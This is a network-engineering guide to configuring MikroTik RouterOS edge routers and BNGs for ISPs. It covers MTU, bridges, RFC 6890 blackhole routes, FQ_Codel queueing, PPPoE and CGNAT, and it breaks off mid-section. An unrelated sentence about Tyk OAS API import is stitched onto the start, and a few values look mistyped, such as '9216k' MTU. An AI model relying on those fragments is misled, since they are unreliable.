When importing an OAS API Definition or updating an existing Tyk OAS API Definition, validateRequest middleware can be automatically configured by Tyk for all the paths that have a schema configured, by passing validateRequest=true as a query parameter for the IMPORT or PATCH request respectively.
Edge Router & BNG Optimisation Guide for ISPs
Last updated on 22 January 2024
It would be appreciated if you could help me continue to provide valuable network engineering content by supporting my non-profit solitary efforts. Your donation will help me conduct valuable experiments. Click here to donate now.
PSA: I’ve updated the CGNAT section with RouterOS v7 EIM-NAT config.
I will remove this ugly PSA in the future, when I clean up this article a bit.
This guide provides configuration instructions for MikroTik RouterOS, but the principles can be applied to other Network Operating Systems (NOSes) as well. The guide will be updated regularly as new technologies, use cases, and more efficient configurations are discovered.
Many ISPs around the globe use MikroTik RouterOS to provide access to their customers via BNGs over PPPoE and for various other roles such as edge routers. In this guide, I will explore common issues and solutions along with best practices.
This guide is also available on the APNIC Blog, however the version there is obselete. I recommend you follow the source here for the most up-to-date information.
A brief history of this project
• The configuration was first tested and deployed on AS135756 (small-sized ISP) with its proprietor Varun Singhania.
• In 2021-22, I tested the configuration further as a downstream customer on AS132559 (IP Transit provider & medium-sized ISP), where I was able to assess the impact and config changes both as an end-user and a consultant.
• From 2022 onwards, I test the configurations on my own network (AS149794), including the firewall rules, to ensure it would work in any environment as long as the instructions are followed. The tests confirmed that the configuration does not disrupt layer 4 protocols or cause problems for end-users in the last mile.
A few things to keep in mind
• RouterOS is based on the Linux Kernel. As of RouterOS v7.14 it still uses legacy iptables for packet filtering instead of nftables, which has a negative impact on performance.
• The guide will be focused on RouterOS v7 as it is the current version of RouterOS.
• This guide assumes the reader has a basic understanding of typical use cases and technologies/protocols used in an ISP/Telco production environment.
• This guide focuses on layer 2-4 configuration (and occasionally up to layer 7) by following various RFCs and BCOPs. It is not a network architecture guide, for which Kevin Myers’s guide is recommended.
• Most (virtually everything) on this article has been tested on RouterOS v7.12.1 (stable + 7.12.1 RouterBOARD firmware).
Basic Router Terminology and overview
• An edge or border router is an inter-AS router that is used for connecting different networks, such as transit, IXP, or PNIs.
• It is important to keep an edge router stateless i.e. without connection tracking (stateful firewall filter rules or NAT), to avoid performance issues and vulnerability to DDoS attacks.
• Do not use an edge router for customer delegation, as it will become stateful.
• Do not confuse an edge router with a Provider Edge router, which is an MPLS-specific terminology.
• A core router is not typically present in modern networks that follow a collapsed core topology.
• BNGs, also known as access layer routers, are used for customer delegation tasks such as PPPoE, DHCP, and CGNAT. They are stateful in nature. Some people may also refer to them as BRAS or NAS (Network Access Servers), all of which are synonyms in my opinion.
General Configuration Changes
Below are the general guidelines that should be applied on all MikroTik devices for optimal performance and security.
• Upgrade RouterOS and the RouterBOARD firmware to the latest stable (or long-term if available) v7 releases. Use this command to enable firmware auto upgrade: "/system routerboard settings set auto-upgrade=yes". Remember to reboot the router twice after the RouterOS upgrade to ensure the firmware gets automatically upgraded.
• Implement basic security measures, including reverse path filtering and enabling TCP SYN cookies, for which the latter two are found in IP>Settings.
• For rp-filter use loose mode when a device is behind asymmetric routing or when in doubt, use strict mode when a device is behind symmetric routing.
IPv6
IPv6 Router Advertisements (RA) are used for SLAAC and/or DHCPv6 and in MikroTik it is called Neighbor Discovery (ND) which is a bit confusing as ND is an umbrella encompassing various protocols and behaviours and not only RAs.
IPv6 RA (ND) is enabled by default for all interfaces on RouterOS. This should be disabled to prevent sending RAs randomly out of interfaces that you do not use SLAAC on and for security reasons such as preventing someone from receiving an IPv6 address by connecting a host to a specific port or VLAN along with reducing unnecessary BUM traffic in your network. We disable it using this command:
/ipv6 nd set [ find default=yes ] disabled=yes
You can enable IPv6 RA on a per-interface basis as and when required, i.e. if you set “advertise=yes” for an interface via IPv6>Address, then you need to configure RA/ND for that interface like the example below:
/ipv6 nd add interface=Management_VLAN
Interface Lists
Interface lists help us simplify firewall rule management by enabling us to refer to an entire list in a single rule instead of multiple rules for every interface.
An interface list should only contain layer 3 (L3) interfaces which is an interface with IP addressing attached to it, such as a physical port, L3 sub-interface VLAN, L3 bonding interface or GRE interface.
The following are basic guidelines for which lists to create and what should be included on those lists:
• WAN” interface list should contain those interfaces used for connecting to transit, PNI, IXP, upstream peering.
• LAN” interface list should contain those interfaces used for downstream connectivity to your retail customers or IP Transit customers etc. You should include “dynamic” interfaces to account for PPPoE clients on BNGs.
• Intra-AS” interface list should contain those interfaces used for connecting one device to another device within the same network such as redundant connectivity between two routers horizontally.
• Management” interface list should contain those interfaces used exclusively for management.
• Do not add bridge members individually into any list as they are purely Layer 2 (L2) interfaces.
It is however, important to note: When you are using bridges (which is discussed later in this article), the interface placements depend on how you set up the bridge – If you’re using a single bridge with physical/bonding interfaces as bridge members without any VLAN configuration, then the bridge will be a member of “LAN”. But if you are using VLANs on top of the bridge, then place the VLANs into their appropriate LAN/Intra-AS/Management list based on your local network topology. For example:
“Management VLAN” will be in the management list, or VLAN123 will be in the “intra-AS” or “LAN” list.
Figure-1 (LAN Include Dynamic)
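As a rough illustration (the interface names below are placeholders and will differ in your network), the lists and their members are configured like this:
/interface list
add name=WAN
add name=LAN
add name=Intra-AS
add name=Management
/interface list member
add interface=sfp-sfpplus1 list=WAN
add interface="Main VLAN" list=LAN
add interface="Management VLAN" list=Management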
Connection Tracking
• Disable connection tracking on the edge router and enable loose TCP tracking on all routers using the following commands:
“/ip firewall connection tracking set enabled=no”
“/ip firewall connection tracking set loose-tcp-tracking=yes”
• Use the recommended connection tracking timeout values to improve stability and performance, especially for UDP traffic like VoIP and gaming. If necessary, upgrade the router’s RAM to accommodate these values.
/ip firewall connection tracking
set icmp-timeout=30s tcp-close-wait-timeout=1m tcp-fin-wait-timeout=2m tcp-last-ack-timeout=30s tcp-syn-received-timeout=1m tcp-syn-sent-timeout=2m tcp-time-wait-timeout=2m udp-stream-timeout=2m udp-timeout=30s
Figure-2 (Recommended Connection Tracking Timeout Values)
Miscellaneous
• Give the router an accurate system clock by enabling the Network Time Protocol (NTP) client and specifying a reliable NTP server such as this example:
“/system ntp client set enabled=yes server-dns-names=time.cloudflare.com”
MTU
To ensure reliable network performance, it is essential to configure the MTU consistently across all devices in the path in both L2 and L3. Inconsistent MTU configurations can result in dropped frames or strange behaviours. Additionally, it is essential to minimize IP fragmentation, properly deploy RFC4638, and ensure PMTUD is working for both IPv4 and IPv6. This will help to ensure reasonable auto-detected TCP MSS negotiation values.
Jumbo frames are ideally the way to go about MTU configuration as it’s future-proofing your network for whatever protocols you may throw at it. You should encourage your provider, peers, and customers to also configure jumbo frames on their network.
Bigger frames = more data per frame, meaning less frames required to transmit data, less CPU/resource utilisation required as packets per second flow will decrease.
Guidelines
Layer 2 MTU
L2 MTU, also known as the “media MTU” should be configured to the maximum supported value on physical interfaces such as Ethernet ports, SFP and wireless interfaces. This applies to any networking hardware, including routers, switches, and hypervisors. The maximum supported value may vary by vendor or model, but that is okay as the L3 MTU will handle the actual packet size negotiation.
However, it is important to note that you must ensure the interfaces all have consistent maximum values, to minimise the number of MTU profiles on the device. The switch chip or ASIC supports only a limited number of MTU profiles, and exceeding that limit could hurt performance or lead to undefined behaviour.
By properly configuring the L2 MTU, you can run any protocol you want (such as VXLAN, MPLS, VPLS, or WireGuard) and still have an MTU far greater than 1500 for layer 3 packets, thereby avoiding fragmentation completely on the overlay, intra-as.
Example:
• Edge router (L2 MTU 9216) > BNG (L2 MTU 9216) > PE router (L2 MTU 9216) > Wireless AP (Bridged mode, often carries 9216 or similar L2 MTU) > Customer edge router (L2 MTU for WAN 9216)
• Edge router (L2 MTU 9216) > BNG (L2 MTU 9216) > PE router (L2 MTU 9216) > OLT (Bridged mode, often carries 9216 or similar L2 MTU) > Customer edge router (L2 MTU for WAN 9216)
Layer 3 MTU
Configure it to 9k MTU, strictly for all physical ports (ethernet, SFP etc). If there is any L2 overhead, such as on a layer 3 sub-interface VLAN, the system will automatically subtract from the L2 MTU and will show us the subtracted L2 MTU, so you can adjust layer 3 MTU accordingly.
The basic gist of this is, we use the 9k L3 MTU on intra-AS and even inter-AS physical interfaces, unless explicitly your peer doesn’t support 9k.
This allows your downstream transit customers to talk to your network and your customers in jumbo frames – For which, you should inform your customer if you’ve enabled jumbo frames for them, their L3 MTU must match your L3 MTU.
But if for example, you are configuring an interface towards your transit or IXP, then you should ask your provider if they support >1500 MTU and configure accordingly. Some transit providers and IXPs supports 9000 MTU, so we take advantage of that when possible.
Some things to be careful of:
• If using Stacked VLANs (QinQ), both S and C VLANs should have equal L3 MTU.
• If your customer equipment does not support high jumbo frame, then simply configure your L3 MTU to match theirs, which is usually 1500.
Example:
• Edge router (L3 MTU 9k) > BNG (L3 MTU 9k) > PE router (L3 MTU 9k) > Wireless AP (bridged mode and permits jumbo frames above 9k) > Customer edge router (L3 MTU for WAN will be 9k, assuming you configure 9k MTU on the S-C VLAN on the BNG)
• Edge router (L3 MTU 9216k) > BNG (L3 MTU 9216k) > PE router (L3 MTU 9k) > OLT (L3 MTU 9k) > (L3 MTU for WAN will be 9k, assuming you configure 9k MTU on the S-C VLAN on the BNG)
MTU can be mixed and match network-wide, but should never mismatch. PMTUD exists for a reason, I have built networks where I had 9k in some paths, 8k in some paths, 1500 in some paths, differences may be on physical interfaces where a sub-interface is configured on top of the physical interface (such as a bridge, or L3 subinterface VLANs on top of the bridge). With proper planning and thought, you shouldn’t have problems with 9k MTU mixed in with lower sized MTU.
The screenshots below are for references to give you an idea of what MTU mix/match (but never mismatch) looks like, this is based on a network I built from scratch. Ether1 is 1500 L3 MTU because it’s my MGMT/OOB port, the other physical ports are all 9k L3 MTU and maxed L2 MTU. The LACP bonding interfaces are my intra-as interfaces connected to my backbone routers, and 9K is configured on their side as well. The VPLS is jumbo frames MPLS network-wide to ensure I can carry as much VLANs as I want, as much L2VPN customers as I want without any problems for jumbo frames.
The VLANs on top of the bridge (excluding the pe01) are tagged to the VPLS circuit (also a member of the bridge) and are configured with 1500 MTU, as these are layer 3 terminating interfaces and my residential customers behind these VLANs don't have routers capable of jumbo frames, so 1500 makes sense. But if, for example, I one day moved all customers on VLAN1501 to routers capable of 9k jumbo frames, then I simply change the MTU configuration on my VLAN interface right here, as the underlying transport network has been enabled with jumbo frames from day one.
Figure-3 MTU Overview
Figure-4 VPLS MTU
MTU Scripts
You can automate the MTU configuration using the scripts below. Please run each one separately as I didn’t put delays in between preventing synchronisation, but be mindful to manually configure L2, L3 MTU and advertised L2 MTU for VPLS/Other PPP interfaces.
#Run the ethernet MTU script first before the others#
#Script to autoconfigure max L2/L3 MTU on ethernet ports#
/interface ethernet
:foreach i in=[find] do={
set $i l2mtu=[/interface get $i max-l2mtu]
set $i mtu=[/interface get $i max-l2mtu]
}
#Script to autoconfigure max L3 MTU on Layer 3 sub-interface VLAN#
/interface vlan
:foreach i in=[find] do={
set $i mtu=[/interface get $i l2mtu]
}
#Script to autoconfigure max L3 MTU on Bonding interfaces#
/interface bonding
:foreach i in=[find] do={
set $i mtu=[/interface get $i l2mtu]
}
#Script to autoconfigure max L3 MTU on VXLAN#
/interface vxlan
:foreach i in=[find] do={
set $i mtu=[/interface get $i l2mtu]
}
#Script to autoconfigure max L2/L3 MTU on Wireless interfaces#
/interface wireless
:foreach i in=[find] do={
set $i l2mtu=2290
set $i mtu=2290
}
#
Linux Bridge Approach
A Linux bridge is a kernel module that acts as a virtual network switch and is used to forward packets between connected interfaces (also known as bridge ports or members). Many network operators do not follow MikroTik’s official guidelines to properly implement L2/3 using a bridge, which results in degraded performance as hardware offloading and/or bridge Fast Path/Fast Forward becomes unusable along with the inability to perform L2 filtering.
Linux-driven hardware such as MikroTik or even Cumulus Linux devices rely heavily on Linux DSA. Linux DSA, the bridge and the VLAN-aware bridge form a very complex, vast topic that currently doesn't have comprehensive, network-engineer-oriented documentation; I will try to work with a buddy of mine to write a new blog post deep-diving the Linux DSA/bridge architecture and what it means for network engineers. Until then, just keep in mind that for layer 3 offloading to work correctly, you need a single bridge for all downstream interfaces and use VLAN filtering to segregate them as "access ports" on a router, and occasionally as trunk ports as well, depending on your topology and use case.
This means if you have a box, and the box has only one ASIC, then only one bridge can exist for physical ports/interfaces/LACP etc. However, you can create a loopback bridge, no problem.
To maximize performance benefits and give you L2 filtering capabilities, it is recommended by MikroTik to create a single bridge per device with all downstream (and intra-AS) interfaces (physical, LACP bonding etc) as bridge members. Tagged/untagged VLANs and hybrid VLANs can be configured using bridge VLAN filtering. Refer to vendor guidelines for model-specific configuration instructions.
If you created an LACP bonding interface between two routers (or switches) for redundancy, you can add the bond interface into the same bridge as a bridge member, where in turn either the bridge itself or the L3 sub-interface VLANs will be an interface list member depending on your topology as discussed in the previous interface lists section.
The management port on newer MikroTik devices is a dedicated port connected to the CPU instead of the ASIC, similar to traditional networking devices from Cisco or Juniper. In such cases, the management port will be fully independent from any bridge, with its own independent VRF. However, if for example you're transporting a management VLAN for a downstream device out of a downstream port, say SFP+12, then SFP+12 will be a member of the bridge, with the VLAN configured on the bridge as usual.
A separate bridge can also be created as a loopback interface without impacting physical interface performance. You can assign the “.0” IPv4 address to this interface along with the “::” IPv6 address of an IPv6 subnet for management, testing purposes or for using as the loopback IPs with OSPF.
Below is a sample configuration from a CCR1036 router using MikroTik guidelines along with sample interface lists:
#Layer 3 configuration such as IP addressing is attached to these interfaces#
/interface vlan
add interface=bridge1 mtu=10218 name="Main VLAN" vlan-id=20
add interface=bridge1 mtu=10218 name="Management VLAN" vlan-id=10
/interface bridge
add frame-types=admit-only-vlan-tagged name=bridge1 vlan-filtering=yes
#Loopback interface#
add arp=disabled name=loopback protocol-mode=none
/interface bridge port
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether1 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether2 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether3 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether4 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether5 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether6 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether7 pvid=20
add bridge=bridge1 frame-types=admit-only-untagged-and-priority-tagged interface=ether8 pvid=10
/interface bridge vlan
add bridge=bridge1 comment="Main VLAN" tagged=bridge1 vlan-ids=20
add bridge=bridge1 comment="Management VLAN" tagged=bridge1 vlan-ids=10
#Attaching IP addressing to the interfaces#
/ip address
add address=100.64.2.1/24 interface="Main VLAN" network=100.64.2.0
add address=103.176.189.0 comment="Public Loopback" interface=loopback network=103.176.189.0
add address=100.64.3.1/25 interface="Management VLAN" network=100.64.3.0
#Example for interface lists#
/interface list member
add interface="Main VLAN" list=LAN
add interface="Management VLAN" list="Management Interfaces"
(R/M)STP
I will not deep dive into how STP works, as that is outside the scope of a guide post like this one. However, a few quick things to keep in mind:
• MikroTik allows us to selectively enable/disable STP/BPDU behaviour per-port if required. This may be needed in networks with complex layer 2 designs; a hedged sketch of the per-port knobs follows below.
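As a hedged sketch only, the per-port knobs I would typically reach for are edge and bpdu-guard on the bridge port (ether8 here is just a placeholder for a host/customer-facing access port):
#Hypothetical per-port STP tuning on an access port#
/interface bridge port
#Edge ports go straight to forwarding and do not generate topology change events#
set [find interface=ether8] edge=yes
#Shut the port down if a BPDU is ever received on it#
set [find interface=ether8] bpdu-guard=yes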
Multicast traffic on the bridge
I personally had a few challenges with multicast traffic/IGMP snooping best practices, for which I had to reach out to MikroTik support for some clarity. Below are a few basic guidelines based on what I gathered from the MikroTik docs and their support team, followed by a hedged config sketch. This is of utmost importance for networks that make use of multicast routing and traffic for their IPTV services and similar.
• Be mindful of IGMP Snooping (and IGMP Proxy/PIM) limitations such as tagged VLAN, and features depending on your local network topology.
• Keep in mind that IPv6 SLAAC will break if you enable multicast querier, for which, you need RouterOS v7.7 onwards to work around this.
• In a layer 2 network if you are using IGMP Snooping, it should be enabled on all the bridges (devices) involved.
• You can also enable IGMP multicast querier on all the bridges, only one will get elected with the rest acting as failover in case a device fails.
• If you are using PPPoE then there is no such thing as true multicast: whilst it may be multicast at layer 3, it will not be true multicast at layer 2 due to the nature of PPPoE, which is a tunnel over layer 2. If you are using DHCP (preferably) or IPoE, this issue does not apply.
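As a minimal sketch of the bridge-level settings referenced above (assuming the bridge1 naming used elsewhere in this article, and keeping the SLAAC caveat in mind before enabling the querier):
#Hypothetical IGMP snooping and querier on the bridge#
/interface bridge
set bridge1 igmp-snooping=yes multicast-querier=yes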
IPv4
I have noticed a lot of operators talking about how short they are on IPv4 addresses, yet for unknown reasons they like to waste 2 extra addresses on every PTP or inter-router link by using a /30. Please stop doing that and start using /31s for PTP links as per RFC 3021.
However, RouterOS v6 and v7 do not support /31 natively; the following is how we achieve the same result.
Example below:
Prefix: 103.176.189.0/31
#MikroTik to MikroTik PTP#
#Router A#
/ip address
add address=103.176.189.0 interface=ether1 network=103.176.189.1 comment="/31 Example"
#Router B#
/ip address
add address=103.176.189.1 interface=ether1 network=103.176.189.0 comment="/31 Example"
#Cross vendor PTP#
#Router A Cisco/Juniper/Huawei etc#
interface eth2 address 103.176.189.0/31
#Router B MikroTik side#
/ip address
add address=103.176.189.1 interface=ether1 network=103.176.189.0 comment="/31 Example"
IPv6
As per RFC6164, it is advised to use /127s on PTP links to avoid various forms of network attacks described in the RFC.
However, for ease of management and subnetting, I would advise not to subnet longer (smaller) than a /64. Please click here to learn more about IPv6 architecture and subnetting plan.
Note that on MikroTik, /127s do not work with BGP for unknown reasons and hence the longest prefix size we can use would be a /126.
Example below:
Prefix: 2400:7060::/126
#Advertise=no because we aren't using SLAAC#
/ipv6 address
add address=2400:7060::1/126 advertise=no comment="Peering with Transit" interface=ether1
However, if you look closely, you might have noticed that I avoided using the all-zeroes interface ID “2400:7060::/126” and instead used “2400:7060::1/126”. The reason is that on some routers, using the “::” (all-zeroes) interface ID (address) on a link can cause strange behaviour.
Routing loops with RFC6890 space
I have observed in most networks, including my own personal home lab (AS149794), a lot of traffic where the source IP is one of my end hosts or a CPE WAN IP (either a CGNAT IP or a public IP), but the destination IP sits in unused RFC 6890 blocks. This is why I (and MikroTik themselves) created a forward rule to drop RFC 6890 traffic before it escapes to the WAN.
Now let us step back and think about this: the majority of ISPs do not implement these filter rules, which means traffic from customers whose destination IP falls in RFC 6890 space is forwarded from their CPE to the BNGs, carried over the underlying L3/L2 paths all the way to the edge router, and from there towards your transits or peers if a default route exists. If there is no default route or more specific route for a given RFC 6890 destination, it simply loops back and forth until the TTL expires, which means wasted CPU and bandwidth once your network is at scale with thousands of customers. To solve this with a quick fix, I derived a simple yet effective solution: route the RFC 6890 blocks to blackhole.
We route all RFC 6890 space to blackhole directly on the edge routers to cover, well, edge cases, but we will also do the same on the BNGs directly.
It will not impact your use of the private space on any given interface/servers etc., because remember, more specific prefixes always win; your private /24s etc. will always be preferred over the less specific /10, for example, and hence remain accessible. Someone on the MikroTik forum has discussed this a bit in the past.
IPv4
#RouterOS v7#
#Copy and paste these on both Edge and BNG routers#
/ip route
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=0.0.0.0/8
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=172.16.0.0/12
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.168.0.0/16
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=10.0.0.0/8
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=169.254.0.0/16
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=127.0.0.0/8
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=224.0.0.0/4
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.18.0.0/15
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.0.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.2.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.51.100.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=203.0.113.0/24
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=100.64.0.0/10
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=240.0.0.0/4
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.88.99.0/24
add blackhole comment="Blackhole route for RFC6890 (limited broadcast)" disabled=no dst-address=255.255.255.255/32
#RouterOS v6#
#Copy and paste these on both Edge and BNG routers#
/ip route
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=0.0.0.0/8
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=172.16.0.0/12
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.168.0.0/16
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=10.0.0.0/8
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=169.254.0.0/16
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=127.0.0.0/8
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=224.0.0.0/4
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.18.0.0/15
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.0.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.0.2.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=198.51.100.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=203.0.113.0/24
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=100.64.0.0/10
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=240.0.0.0/4
add type=blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=192.88.99.0/24
add type=blackhole comment="Blackhole route for RFC6890 (limited broadcast)" disabled=no dst-address=255.255.255.255/32
IPv6
#RouterOS v7#
#Copy and paste these on both Edge and BNG routers#
/ipv6 route
add blackhole comment="Blackhole route for RFC6890" disabled=no dst-address=::1/128
add blackhole comment="Blackhole route for RFC6890" disabled=no dst-address=::/128
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=64:ff9b::/96
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=::ffff:0:0/96
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=100::/64
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001::/23
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001::/32
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001:2::/48
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001:db8::/32
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2001:10::/28
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=2002::/16
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=fc00::/7
add blackhole comment="Blackhole route for RFC6890 (aggregated)" disabled=no dst-address=fe80::/10
#In RouterOS v6, IPv6 blackhole is not supported#
QoS and Bufferbloat control
Going forward from 2023 onwards with RouterOS v7 (or any modern OS), and based on the immense amount of work, data and results published by Dave Täht on QoS/QoE, and more specifically on the main problem in this domain, bufferbloat, I would recommend using FQ_Codel network-wide as the default queueing algorithm. The main reason to opt for FQ_Codel over the end-user-oriented CAKE is that it was designed for backbone usage, such as ISPs, telcos and carriers.
In configuration terms, this means applying the FQ_Codel queue type to all physical ports and wireless interfaces across all your network devices, and ensuring the same queue type is used for customer queueing.
An important point to note is that the out-of-the-box defaults of FQ_Codel are good for physical interfaces up to 40Gbps. If a single physical port carries more than 40Gbps of traffic, you will need a custom, tuned FQ_Codel profile for that specific port; a hedged sketch follows the example below.
Example configuration on a CCR1036:
/queue type
add kind=fq-codel name=FQ_Codel
/queue interface
set ether1 queue=FQ_Codel
set ether2 queue=FQ_Codel
set ether3 queue=FQ_Codel
set ether4 queue=FQ_Codel
set ether5 queue=FQ_Codel
set ether6 queue=FQ_Codel
set ether7 queue=FQ_Codel
set ether8 queue=FQ_Codel
set sfp-sfpplus1 queue=FQ_Codel
set sfp-sfpplus2 queue=FQ_Codel
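For the over-40Gbps case mentioned above, a tuned profile is needed; the values and the sfp28-1 port name below are purely illustrative assumptions, not tested recommendations, and should be sized against your actual port speed and available memory:
#Hypothetical tuned FQ_Codel profile for a port carrying more than 40Gbps, illustrative values only#
/queue type
add kind=fq-codel name=FQ_Codel_100G fq-codel-flows=4096 fq-codel-limit=20480 fq-codel-memlimit=67108864
/queue interface
set sfp28-1 queue=FQ_Codel_100G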
In addition to network backbone FQ_Codel implementation, you can also consider deploying an open-source bufferbloat killer traffic shaping device using LibreQoS.
Below is a screenshot of the test results from this tool on a wireless ISP network that I architected and implemented myself from the ground up. I should note that I implemented everything from this guide plus other design considerations, including the network-wide FQ_Codel config; in my case there is no LibreQoS-like device, as I wanted a simpler network topology, and the end result below is better than even some fibre (PON) networks out there in the market.
Figure-5 (Bufferbloat test on a wireless network designed and implemented by daryllswer.com)
For BNG
PPPoE
Issues
• Packet fragmentation due to non-standard 1500 MTU/MRU
• Typically, ISPs use 1492 or 1480 or some other strange MTU size
• Both BNG device and customer router need to make use of hacks like TCP MSS Clamping to work around this
• PMTUD is simply unreliable as per RFC 8900
• Gets worse with CGNAT because remote end-points cannot determine the MTU of your PPPoE customer behind it
• Lack of proper routing for PPPoE Clients (Interfaces or Inter-VLANs)
• Most assume that using a single profile for different PPPoE Servers running on different interfaces will work fine
Solutions
• The real long term solution is to migrate to DHCP to completely avoid all performance and MTU issues that are exclusively only an issue on PPPoE and similar encapsulation protocols.
• Deploy RFC 4638
• Keep in mind that MTU affects the whole path of L2/L3 devices in a network, whether physical or virtual; as long as you follow the MTU section above, you should be good
• Simply set MTU and MRU to 1500 inside PPPoE Server on the BNG
• However, if you are interested in jumbo frames to your peers/PNI/IXP etc., you can configure the MTU/MRU to a fixed 9000 bytes; the reason for using 9000 bytes for inter-AS traffic is explained here
• In order for this to work correctly you need to strictly follow the MTU section
• If using wireless APs, then it would be 2290-8=2282 bytes
Figure-6 (PPPoE Server MTU/MRU & TCP MSS Clamping config)
• Disable (and delete!) TCP MSS Clamping rules inside IP>Firewall>Mangle
• Why set some arbitrary value when you can let the engine determine it automatically to ensure optimal performance?
• MikroTik has long since supported automatic TCP MSS clamping. Make use of PPP>Profile>Default* to enable TCP MSS clamping directly on the PPPoE engine; this will do the work for any customer whose MTU/MRU is less than 1500.
• On the customer side, not all routers can take advantage of RFC4638, such as TP-Link, Tenda etc. For them, MTU will remain capped at 1492.
• The 1492 limitation on their end will not cause packet fragmentation issues, as packets are fragmented at the source (their routers) before they exit the interface and hit the BNG, and TCP MSS clamping on the PPPoE engine takes care of anything coming in from the outside world towards the customer
• I have observed a 1500 MRU when pinging from the outside world, suggesting some of these consumer routers do support a 1500 MRU
• If they are using MikroTik, pfSense, VyOS etc, they can take advantage of RFC4638 aka 1500 MTU/MRU for their PPPoE Client
• Some ONT/ONU devices have strange behaviour for MTU negotiation where they simply do not allow RFC4638 to work (even in bridge mode), only a few brands like GX, TP-Link, and Huawei have been found to be flawless in my personal testing.
Verify MTU config
If you have properly configured MTU and MSS Clamping as per the steps above, then you should see the following results when testing from customer-side using this tool:
Figure-7 (MTU and TCP MSS correctly working on the internet)
Extra Note on PPPoE
• Create a single CGNAT pool on a per BNG basis and you can use it for n Number of PPPoE Servers on n number of interfaces
/ip pool
add name=CGNAT_Pool comment="100.64.0.0-9 is reserved for each PPPoE Server Gateway/Profile" ranges=100.64.0.10-100.127.255.255
• Here we are reserving 100.64.0.0-9 for gateway IPs on a per-interface/PPPoE server basis, assuming we only have 10 VLANs/Interfaces
• Reserve as per your local requirements
• Local Address in PPP Profile = Gateway IP address
• One common mistake is using the router’s public IP from the WAN interface as the local address, which I have seen lead to issues like traceroute failures or strange packet loss; you should use an address that does not exist in IP>Address
• Each PPPoE server needs a unique profile/gateway in order to allow inter-VLAN communication between CPEs (needed, for example, so two customers behind NATted IPs on different VLANs can play a P2P Xbox game with each other) and to ensure a clean network approach
• If you have 100 PPPoE Servers, there should be 100 unique PPP Profiles with unique local addresses for each
• Something like this for two servers:
/ppp profile
add change-tcp-mss=yes local-address=100.64.0.1 name=profile1 remote-address=CGNAT_Pool use-upnp=no
add change-tcp-mss=yes local-address=100.64.0.2 name=profile2 remote-address=CGNAT_Pool use-upnp=no
/interface pppoe-server server
add authentication=pap default-profile=profile1 interface=vlan20 keepalive-timeout=disabled max-mru=1500 max-mtu=1500 one-session-per-host=yes service-name=server1
add authentication=pap default-profile=profile2 disabled=no interface=vlan21 keepalive-timeout=disabled max-mru=1500 max-mtu=1500 one-session-per-host=yes service-name=server2
CGNAT
Issues
• The majority of ISPs are using RFC1918 subnets for CGNAT, which will clash with subnets on the customer site
• Breaks NAT Traversal for protocols like IPSec, FTP etc
• Poor config, that breaks P2P traffic, kills the end-to-end principle
• Lack of hairpinning breaks inter-client P2P traffic
• Lacks EIM-NAT (newly added by MikroTik)
• Routing Loops will occur for any traffic coming from the outside destined towards the public IP pools that aren’t related to NATted traffic
Solutions
• Make use of the 100.64.0.0/10 subnet as it’s meant for CGNAT usage to prevent clashing on the customer site
• Enable all the NAT traversal Helpers on the NAT box, as shown below.
